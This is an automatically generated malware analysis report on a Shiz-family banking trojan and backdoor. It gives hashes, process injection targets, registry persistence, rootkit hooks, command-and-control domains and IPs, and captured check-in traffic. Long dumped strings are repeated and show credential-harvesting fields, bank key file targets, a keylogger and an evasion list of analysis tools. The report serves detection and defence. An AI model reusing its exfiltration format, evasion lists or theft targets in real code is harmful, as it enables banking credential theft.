Gen.Heur.FKP.1_8911d934d6

by malwarelabrobot on August 28th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Heur.FKP.1 (B) (Emsisoft), Gen:Heur.FKP.1 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 8911d934d6ca504d3190ced1e6cef620
SHA1: 0d231a66d3a2c7a0d52e600212da69b4c66ef978
SHA256: 2e1af36b1e793331e01f44f1f4cd31403c78da692bbbb6e3a477a983318c1cda
SSDeep: 6144:jvZR8D2L mqP/lH8nNnlfttDkJsZLX0tTMPd:jvZiqL mUwXTIoLX0tgPd
Size: 242176 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 1990-09-29 10:35:11
Analyzed on: WindowsXP SP3 32-bit


Summary:

Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1860

The Trojan injects its code into the following process(es):

winlogon.exe:716
svchost.exe:932
svchost.exe:1012
svchost.exe:1100
svchost.exe:1144
svchost.exe:1184
Explorer.EXE:1988

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1860 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\AppPatch\fciniiq.exe (1765 bytes)
%System%\config\software (2440 bytes)
%System%\config\SOFTWARE.LOG (5347 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\B2.tmp (0 bytes)

Registry activity

The process %original file name%.exe:1860 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 89 EE A3 31 62 09 5B 40 B0 C1 8E 6F A7 13 3F"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\fciniiq.exe_, \??\%WinDir%\apppatch\fciniiq.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = "pEìX£bÀ¸¬qÄHF‡KöDúz=º«H$YÉ<»¹œ³ŒQ\´òd¼Œ¤Kô1,Å $ë›ÛÌ«”¹l}Ë {Å“zΙC%é[qñl4ì;û´[Ã’#»Û:ÑU„„ԝ\±ª²DÆ’uÅ“¡Ü¼); ¼\Æ’tµ2”kDù”a”*›cü$}Sô|ë$¤ô {¬q³#sÃ…Ã¥\yuJÛËu©|ù ¢rKã!$’‹‹b±ÃÄ £ãÍ‚ “ÉUcdÁÄZ¡r»ô”)Û©Š ]“QlYÛl]$$D´ƒÌ£Q$aŒ‚*â„¢ü›ÙóÍÁ=éÔÑщ¬ q9|áíù’‘íÁ©šÄRa8a67a25"

Dropped PE files

MD5 File path
0f5123686dfac9f721db41b5ea118008 c:\WINDOWS\AppPatch\fciniiq.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in USER32.dll:

GetClipboardData
SetThreadDesktop
GetMessageA
GetMessageW
TranslateMessage

The Trojan installs the following user-mode hooks in ntdll.dll:

RtlGetNativeSystemInformation

Propagation

VersionInfo

Company Name: COMODO
Product Name: nonchampion
Product Version: 9.8.4.6
Legal Copyright: Humbuggery
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 5.4.7.4
File Description: pedantesque
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.U 4096 6947 7168 3.99356 e93a8ae2034243c9b8422ebbfd309300
.jC 12288 166942 4608 4.85153 54713715ccbe98ff54ecfa15c0cbc6d4
.LRK 180224 90088 1536 4.69441 cdeca549491caaeba98cab10357d3f04
.g 270336 498303 3584 4.67826 acb72dd387a3fc5961614ae228b5463e
.ucKPZR 770048 94461 94720 5.53794 fd9be9e20d98a7490f7ca99ad0b13844
.pWz 868352 12800 12800 4.21382 546c3e68f9c154010a3551ceb16e948a
.o 884736 3927 3584 3.48286 5f4083c2c44a4a3a9232a0d028ebc49e
.sjcOq 888832 90165 90624 5.54027 a9238e0770dc210b24a92bb9621b1385
.an 983040 386780 12800 4.76446 01e3c775db3a528650d2a0521dca22e0
.l 1372160 49335 2048 2.88781 44aebcaa03a0f19eaacca1d88d5e3336
.rsrc 1425408 6412 6656 3.1793 71ac31230fcc31b9d8fba73ee7d38a52
.reloc 1433600 1024 1024 4.59015 8951cd57234c578ab632d8739a0d65b4

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
0c1094311291df761804f2297274e1ed

URLs

URL IP
hxxp://vocyzit.com/login.php 69.195.129.70
hxxp://vojyqem.com/login.php 198.74.50.135
hxxp://qetyfuv.com/login.php 141.8.225.80
hxxp://gatyfus.com/login.php 86.124.164.25
hxxp://vowydef.com/login.php 166.78.144.80
hxxp://qekyqop.com/login.php 107.20.253.26
hxxp://lymysan.com/login.php 94.126.178.29
hxxp://qetyvep.com/login.php 109.74.196.143
hxxp://purycap.com/login.php 193.166.255.171
vonyzuf.com 141.8.225.80
pumyxiv.com 198.74.50.135
puzywel.com 198.74.50.135
vofygum.com 141.8.225.80
gadyniw.com 109.74.196.143
lysynur.com 141.8.225.80
qegyhig.com 198.74.50.135
gadyfuh.com 141.8.225.80
puvyxil.com 198.74.50.135
pumypog.com 198.74.50.135
galyqaz.com 198.74.50.135
qeqysag.com 198.74.50.135
puvytuq.com 198.74.50.135
vocyruk.com 141.8.225.80
puzylyp.com 109.74.196.143
lygygin.com 198.74.50.135
volykyc.com 198.74.50.135
www.bing.com 204.79.197.200
lysyfyj.com 198.74.50.135
pufygug.com 198.74.50.135


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Win32.Shiz.fxm/Agent-TBT Checkin
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 2.
ET TROJAN Known Sinkhole Response Header

Traffic

POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekyqop.com
Content-Length: 9
Pragma: no-cache

....~7.~'

HTTP/1.1 200 OK
Date: Fri, 15 Aug 2014 19:28:06 GMT
Connection: close
Cache-Control: private, no-cache, no-store, max-age=0
Expires: Mon, 01 Jan 1990 0:00:00 GMT
X-Frame-Options: DENY


<!DOCTYPE html><html><head>.<meta charset="utf-8"
><style type="text/css"><!--.html, body, #partner, iframe 
{height:100%; width:100%; margin:0; padding:0; border:0; outline:0; fo
nt-size:100%; vertical-align:baseline; background:transparent;}body {o
verflow:hidden;}--></style>.<meta name="expires" content="
NOW"><meta name="GOOGLEBOT" content="index, follow, all"><
meta name="robots" content="index, follow, all"><meta name="view
port" content="width=device-width; initial-scale=1.0; maximum-scale=1.
0; user-scalable=0;"></head>.<body><div id="partner"
><style type="text/css">a.mp {float: left; margin: 3x 5px 1px
 5px;padding: 4px; border-top: 1px solid #cec5a0; border-bottom: 2px s
olid #ea0; border-left: 1px solid #cec5a0; border-right: 2px solid #ea
0; background: #f8f3d4; text-align: center; text-decoration: none; fon
t: normal 14px Arial;  color: #04336d;} a.mp:hover { text-decoration: 
underline;}</style><div style="font-family: Arial; text-align
:center"><table width="790" cellspacing="0" cellpadding="5" styl
e="margin: 0 auto 0 auto; text-align:left;">.<tr>.<td vali
gn="middle">This domain has expired. Please <a href="hXXp://VVV.
dynadot.com/community/help/question/renew-domain">renew</a> i
t at <a href="hXXp://VVV.dynadot.com" target="_blank">Dynadot.co
m</a>
<small>$9.99 domains, $2.00 privacy, $1.00 
hosting, $15.99 ssl certs</small></td>.POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyfus.com
Content-Length: 9
Pragma: no-cache

....~7.~'
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Fri, 15 Aug 2014 22:27:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4
Connection: close
'OK'..



POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vowydef.com
Content-Length: 9
Pragma: no-cache

....~7.~'
HTTP/1.1 200 OK
Date: Fri, 15 Aug 2014 19:28:11 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Sinkhole: malware-sinkhole
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html



POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocyzit.com
Content-Length: 9
Pragma: no-cache

....~7.~'
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Fri, 15 Aug 2014 19:28:09 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 0
Connection: close



POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lymysan.com
Content-Length: 9
Pragma: no-cache

....~7.~'
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 15 Aug 2014 19:28:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.4.15-1~dotdeb.2







The Trojan connects to the servers at the folowing location(s):







winlogon.exe_716_rwx_01940000_000B4000:




.text
`.data
.reloc
`.rdata
@.data
<>http
PSShL
SSShp
tUSSSh
SSShp;
SSSh0 
SSShpk
SSShpF
t9SSSh
u1SSShP
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
C:\iDEFENSE
\\.\NPF_NdisWanIp
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.4.10
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
/search.php
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
%s\%s
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
MSVCRT.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
RegDeleteKeyA
ADVAPI32.dll
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
.Prev
.current
1-191j1w1}1
?"?(?-?~?
;-;5;=;^;|;
7"7)7\7~7
6 6$6(6,6064686
mavast.com
ya.ru
serverkey.dat
\windows\

winlogon.exe_716_rwx_01C70000_000C3000:




.text
`.rdata
@.data
.reloc
<>http
PSShL
SSShp
tUSSSh
SSShp;
SSSh0 
SSShpk
SSShpF
t9SSSh
u1SSShP
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
C:\iDEFENSE
\\.\NPF_NdisWanIp
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.4.10
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
/search.php
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
%s\%s
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
MSVCRT.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
RegDeleteKeyA
ADVAPI32.dll
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
.Prev
.current
SYSTEM!XP1!F9BE9A8A
%Documents and Settings%\%current user%\Application Data\
1-191j1w1}1
?"?(?-?~?
;-;5;=;^;|;
7"7)7\7~7
6 6$6(6,6064686
`.data
mavast.com
ya.ru
serverkey.dat
\windows\

svchost.exe_932_rwx_00ED0000_0005B000:




.text
`.data
.reloc
`.rdata
@.data
<>http
PSShL
SSShp
tUSSSh
SSShp;
SSSh0 
SSShpk
SSShpF
t9SSSh
u1SSShP
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
C:\iDEFENSE
\\.\NPF_NdisWanIp
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.4.10
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
/search.php
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
